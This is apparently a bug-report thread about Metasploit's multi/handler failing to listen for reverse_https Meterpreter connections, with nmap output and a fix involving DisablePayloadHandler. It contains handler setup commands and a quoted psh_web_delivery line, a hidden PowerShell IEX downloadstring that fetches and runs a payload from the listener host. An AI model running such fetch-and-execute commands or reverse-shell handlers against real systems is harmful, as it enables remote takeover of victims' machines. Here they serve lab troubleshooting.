Multi/Handler with any reverse shell cant listen to lport

[fecosco]

Some times when use Multi/Handler on Kali (debian and ubuntu shows the same issues some times) it can't listen to conections, web_delivery works well.... so... there is no lan issues.... folow steps:

       msf exploit(handler) > use multi/handler
       msf exploit(handler) > set payload windows/x64/meterpreter/reverse_https
       payload => windows/x64/meterpreter/reverse_https
       msf exploit(handler) > set lhost 10.2.0.110
       lhost => 10.2.0.110
       msf exploit(handler) > set exitonsession false
       exitonsession => false
       msf exploit(handler) > exploit -j -z
       [*] Exploit running as background job 5.
       msf exploit(handler) > jobs

       Jobs
       ====

         Id  Name                    Payload                                Payload opts
         --  ----                    -------                                ------------
         5   Exploit: multi/handler  windows/x64/meterpreter/reverse_https  https://10.2.0.110:443

When scan with nmap, port 443 is closed:

      Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-22 00:03 -02
      NSE: Loaded 146 scripts for scanning.
      NSE: Script Pre-scanning.
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Initiating Parallel DNS resolution of 1 host. at 00:03
      Completed Parallel DNS resolution of 1 host. at 00:03, 0.17s elapsed
      Initiating SYN Stealth Scan at 00:03
      Scanning 10.2.0.110 [1 port]
      Completed SYN Stealth Scan at 00:03, 0.22s elapsed (1 total ports)
      Initiating Service scan at 00:03
      Initiating OS detection (try #1) against 10.2.0.110
      adjust_timeouts2: packet supposedly had rtt of -127015 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -127015 microseconds.  Ignoring time.
      Retrying OS detection (try #2) against 10.2.0.110
      adjust_timeouts2: packet supposedly had rtt of -101067 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101067 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101032 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101032 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101271 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101271 microseconds.  Ignoring time.
      WARNING: OS didn't match until try #2
      NSE: Script scanning 10.2.0.110.
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Nmap scan report for 10.2.0.110
      Host is up (0.000055s latency).

      PORT    STATE  SERVICE VERSION
                443/tcp closed https
      Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
      Device type: general purpose
      Running: Linux 2.6.X
      OS CPE: cpe:/o:linux:linux_kernel:2.6
      OS details: Linux 2.6.14 - 2.6.34, Linux 2.6.17, Linux 2.6.17 (Mandriva)
      Network Distance: 0 hops

      NSE: Script Post-scanning.
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Read data files from: /usr/bin/../share/nmap
      OS and Service detection performed. Please report any incorrect results at                     https://nmap.org/submit/ .
      Nmap done: 1 IP address (1 host up) scanned in 3.43 seconds
       Raw packets sent: 32 (3.738KB) | Rcvd: 61 (6.212KB)

Now, look the same enviroment with working psh_web_delivery

       use exploit/multi/script/psh_web_delivery
       set payload windows/meterpreter/reverse_https
       msf exploit(psh_web_delivery) > set srvhost 10.2.0.110
       srvhost => 10.2.0.110
       msf exploit(psh_web_delivery) > set srvport 8080
       srvport => 8080
       msf exploit(psh_web_delivery) > set lport 80
       lport => 80
       msf exploit(psh_web_delivery) > set uripath update
       msf exploit(psh_web_delivery) > exploit -j -z
       [*] Exploit running as background job 6.

       [*] Started HTTPS reverse handler on https://10.2.0.110:80
       msf exploit(psh_web_delivery) > [*] Using URL: http://0.0.0.0:8080/update
       [*] Local IP: http://10.2.0.110:8080/update
       [*] Server started.
       [*] Run the following command on the target machine:
       powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object                       net.webclient).downloadstring('http://10.2.0.110:8080/update'))"
       jobs

       Jobs
       ====

         Id  Name                                    Payload                                Payload opts
         --  ----                                    -------                                ------------
         5   Exploit: multi/handler                  windows/x64/meterpreter/reverse_https                        https://10.2.0.110:443
         6   Exploit: multi/script/psh_web_delivery  windows/meterpreter/reverse_https      https://10.2.0.110:80

       msf exploit(psh_web_delivery) > 
       [*] 10.2.0.103       psh_web_delivery - Delivering Payload
       [*] https://10.2.0.110:80 handling request from 10.2.0.103; (UUID: 4ryy1v13) Staging x86 payload            (180311 bytes) ...
       [*] Meterpreter session 2 opened (10.2.0.110:80 -> 10.2.0.103:49240) at 2017-12-22 00:12:08 -0200

When scan with nmap, port 8080 ans 80 are opened:

       Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-22 00:18 -02
       NSE: Loaded 146 scripts for scanning.
       NSE: Script Pre-scanning.
       Initiating NSE at 00:18
       Completed NSE at 00:18, 0.00s elapsed
       Initiating NSE at 00:18
       Completed NSE at 00:18, 0.00s elapsed
       Initiating Parallel DNS resolution of 1 host. at 00:18
       Completed Parallel DNS resolution of 1 host. at 00:18, 0.08s elapsed
       Initiating SYN Stealth Scan at 00:18
       Scanning 10.2.0.110 [1000 ports]
       Discovered open port 8080/tcp on 10.2.0.110
       Discovered open port 80/tcp on 10.2.0.110
       Completed SYN Stealth Scan at 00:18, 1.59s elapsed (1000 total ports)
       Initiating Service scan at 00:18
       Scanning 2 services on 10.2.0.110
       Completed Service scan at 00:18, 18.39s elapsed (2 services on 1 host)
       Initiating OS detection (try #1) against 10.2.0.110
       NSE: Script scanning 10.2.0.110.
       Initiating NSE at 00:18
       Completed NSE at 00:19, 47.17s elapsed
       Initiating NSE at 00:19
       Completed NSE at 00:19, 0.00s elapsed
       Nmap scan report for 10.2.0.110
       Host is up (0.0000060s latency).
       Not shown: 998 closed ports
       PORT     STATE SERVICE  VERSION
                  80/tcp   open  ssl/http Apache httpd
       |_http-server-header: Apache
       |_http-title: Site doesn't have a title.
       | ssl-cert: Subject: countryName=US/ST=NM/L=Amy/O=Edward/CN=vojr.5hlhhrgt.edu
       | Issuer: countryName=US/O=Roy/CN=Nancy George
       | Public Key type: rsa
       | Public Key bits: 2048
       | Signature Algorithm: sha256WithRSAEncryption
       | Not valid before: 2016-03-08T03:58:09
       | Not valid after:  2019-03-08T03:58:09
       | MD5:   c359 ee7b 3192 4376 26fc 7197 1797 7401
       |_SHA-1: c279 054f 738b e5ef 89e0 45b2 0352 7c1a 18d4 8683
                  8080/tcp open  http     Apache httpd
       |_http-server-header: Apache
       |_http-title: 404 Not Found
       Device type: general purpose
       Running: Linux 3.X|4.X
       OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
       OS details: Linux 3.8 - 4.9
       Uptime guess: 49.038 days (since Thu Nov  2 23:24:54 2017)
       Network Distance: 0 hops
       TCP Sequence Prediction: Difficulty=260 (Good luck!)
       IP ID Sequence Generation: All zeros

       NSE: Script Post-scanning.
       Initiating NSE at 00:19
       Completed NSE at 00:19, 0.00s elapsed
       Initiating NSE at 00:19
       Completed NSE at 00:19, 0.00s elapsed
       Read data files from: /usr/bin/../share/nmap
       OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
       Nmap done: 1 IP address (1 host up) scanned in 70.05 seconds
       Raw packets sent: 1114 (51.720KB) | Rcvd: 2232 (97.812KB)

[wvu]

Shows as open for me. Paste your Nmap commands.

[fecosco]

Sorry,

MSF ver is v4.16.13-dev nmap -sV -T4 -O -F --version-light 10.2.0.110 -p <port 443, 80, 8080, any port used in msf>

[wvu]

-F is incompatible with -p, btw.

[wvu]

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set lhost [redacted]
lhost => [redacted]
msf exploit(multi/handler) > set lport 443
lport => 443
msf exploit(multi/handler) > set exitonsession false
exitonsession => false
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
msf exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://[redacted]:443
[*] https://[redacted]:443 handling request from [redacted]; (UUID: hrzqu8av) Unknown request to  with UA ''

root@hiigara:~# nmap -sV -T4 -O --version-light [redacted] -p 443,80,8080

Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-22 06:11 CST
Nmap scan report for [redacted]
Host is up (0.00022s latency).

PORT     STATE  SERVICE    VERSION
80/tcp   closed http
443/tcp  open   ssl/http   Apache httpd
8080/tcp closed http-proxy
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.8 - 4.9
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds
root@hiigara:~#

Check your networking once again.

[fecosco]

I found the problem, it works without DisablePayloadHandler set to true.

[wvu]

That's because DisablePayloadHandler disables the payload handler.